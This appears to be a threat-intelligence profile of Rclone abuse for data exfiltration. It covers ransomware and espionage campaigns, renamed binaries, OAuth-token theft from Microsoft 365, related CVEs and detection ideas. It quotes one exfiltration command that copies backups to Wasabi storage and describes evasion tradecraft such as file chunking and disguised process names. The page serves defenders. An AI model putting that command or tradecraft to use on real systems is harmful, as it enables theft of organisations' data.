Rclone is a legitimate open-source command-line file synchronization and cloud storage management tool that is repeatedly described in the content as being abused for data exfiltration. It supports transfers to numerous cloud and remote storage backends including S3-compatible services, Google Drive, Dropbox, MEGA, OneDrive, SharePoint, Wasabi, Backblaze, Put.io, and SFTP destinations. The content specifically notes that its chunker overlay can split large files into smaller parts during upload to bypass size limits.
Across the cited reporting, Rclone is a dominant exfiltration utility in ransomware and post-compromise operations. Threat actors used it to transfer data from internal network locations or local servers to attacker-controlled cloud storage, often with filtering or bandwidth controls to reduce visibility. It is described as a staple of ransomware exfiltration workflows and is frequently renamed or hidden to evade detection, including examples such as crowdstrike.exe and TrendFileSecurityCheck.exe.
The content associates Rclone use with multiple threat actors and campaigns. MuddyWater (Seedworm), assessed as linked to Iran’s MOIS, used Rclone for exfiltration to Wasabi and Backblaze in 2026 operations targeting U.S. and Israeli organizations, including sectors such as banking, defense, aerospace, transportation, and other critical infrastructure. Storm-1175 is described as using Bandizip for collection and Rclone for exfiltration in rapid Medusa ransomware campaigns affecting healthcare, education, professional services, and finance in Australia, the United Kingdom, and the United States. A Qilin-linked post-compromise case involving exploitation of Check Point VPN vulnerabilities included an identified MD5 matching an Rclone binary. Operation CamelClone used a portable Rclone v1.70.3 copy to upload stolen desktop documents and Telegram Desktop session data to MEGA in espionage targeting government, defense, and diplomatic entities in Algeria, Mongolia, Ukraine, and Kuwait. The content also references use by Akira, BlackCat/ALPHV affiliates, Medusa Group, RansomHub, Hunters International, and other ransomware intrusions.
Observed behaviors include exfiltration of backup data, QuickBooks databases, business documents, network share contents, SharePoint and OneDrive data, and approximately 1 TB-scale theft in some incidents. In one Microsoft 365-focused intrusion, attackers obtained OAuth consent for an application identified as rclone and recovered configuration data containing OneDrive and SharePoint remotes with OAuth access and refresh tokens and scopes including Files.ReadWrite.All and Sites.Read.All. Additional indicators and tradecraft directly mentioned in the content include creation of an "rclone" tool folder on compromised servers, command lines referencing Wasabi or Backblaze, transfers to MegaSync/MEGA and Wasabi cloud storage, and file hashes matching Rclone binaries.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-50751 is the kind of vulnerability that should make you audit your IKEv1 configurations before you finish reading this sentence... an unauthenticated remote attacker can manipulate the IKEv1 exchange in a way that causes the gateway to accept the session as authenticated without ever verifying a valid user password.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day. | CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Detects Rclone transfers to Wasabi, Backblaze, and Put.io, cloud storage used by MuddyWater (Seedworm) for data exfiltration in 2026 U.S. and Israeli targeting operations.
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration.
Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
"Additional Resources ... Rclone"; "Exfiltration Over C2 Channel (performed by SystemBC and Rclone)"
13 distinct techniques documented for this family, organized by ATT&CK tactic.
adversaries rarely execute tools like MegaCmd or MegaSync under their original filename... you might achieve a good detection outcome by identifying processes based on metadata like their internal name and then alerting when the internal name and the presented process name do not match.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
The group has been associated with callback phishing, voice phishing, fake IT support workflows, remote monitoring and management tooling, data theft, and follow-on extortion.
Victims who refuse to pay face not only locked systems but also the exposure of sensitive corporate records on INC’s data leak site.
AppleSeed has divided files if the size is 0x1000000 bytes or more. APT28 has split archived exfiltration files into chunks smaller than 1MB. APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.
Akira were identified to exfiltrate data using the following utilities: WinSCP, FileZilla, Rclone, Bitvise SSH Client
For example, in case the chosen method of transfer is over the Domain Name System (DNS) protocol some of the possible tools for usage can be Pulsar or DNSExfiltrator. Additionally, another tool which is used for data exfiltration is the Rclone.
Qilin targets enterprises across multiple sectors, leverages double-extortion (encrypt + exfiltrate)
37 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
54 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source command-line file transfer utility used by attackers for data exfiltration to cloud or remote storage destinations.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Rclone was used to access Microsoft 365 resources via OAuth tokens and exfiltrate SharePoint and OneDrive data using API-based access.
A file-synchronization utility used by attackers to stage and exfiltrate business-relevant data from internal network locations to external cloud storage.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.